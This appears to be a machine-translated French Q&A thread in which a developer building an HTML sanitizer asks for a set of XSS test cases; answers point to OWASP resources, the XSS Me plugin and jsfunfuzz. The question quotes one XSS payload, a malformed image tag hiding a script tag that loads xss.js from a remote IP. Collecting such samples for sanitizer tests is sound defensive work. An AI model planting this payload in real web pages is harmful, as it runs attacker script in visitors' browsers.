Test de torture XSS - existe-t-il?

Question

Je cherche à écrire un désinfectant html et, bien évidemment, à tester / prouver que cela fonctionne correctement, il me faut un ensemble d’exemples XSS pour pouvoir comparer ses performances. Voici un bel exemple de Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Je sais qu'il existe un test de torture de mime composé de plusieurs tests imbriqués. les e-mails avec pièces jointes utilisés pour tester les décodeurs Mime (s’ils peuvent le décoder correctement, leur fonctionnement a été prouvé). Je cherche fondamentalement un équivalent pour XSS, c’est-à-dire une liste d’exemples de html douteux que je peux envoyer à mon désinfectant pour s’assurer que tout fonctionne correctement.

Si quelqu'un possède également de bonnes ressources sur la manière d'écrire le désinfectant (quels exploits courants essaient d'utiliser, etc.), il serait également très reconnaissant.

Merci d'avance: -)

Éditer: Désolé si cela n’était pas clair auparavant, mais j’étais après une série de tests de torture pour pouvoir écrire des tests unitaires pour le désinfectant, pas pour le tester dans le navigateur, etc. Les données source en théorie ont peut-être été fournies de n'importe où - pas seulement d'un navigateur.

Answer 1

Jetez un coup d'œil à cette liste de trucs XSS: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me est un excellent plugin Firefox contre lequel vous pouvez exécuter votre désinfectant.

Answer 3

Découvrez OWASP . Ils ont de bonnes indications sur le fonctionnement de XSS, sur ce qu’il faut rechercher et même sur le WebGoat

Answer 4

Vous pouvez essayer le jsfunfuzz de Jesse Ruderman ( http: //www.squarefree .com / 2007/08/02 / introduction-jsfunfuzz / ) qui envoie des données aléatoires sur votre code Javascript afin de tenter de le casser. Il semble que l’équipe de Firefox l’ait utilisé avec un grand succès.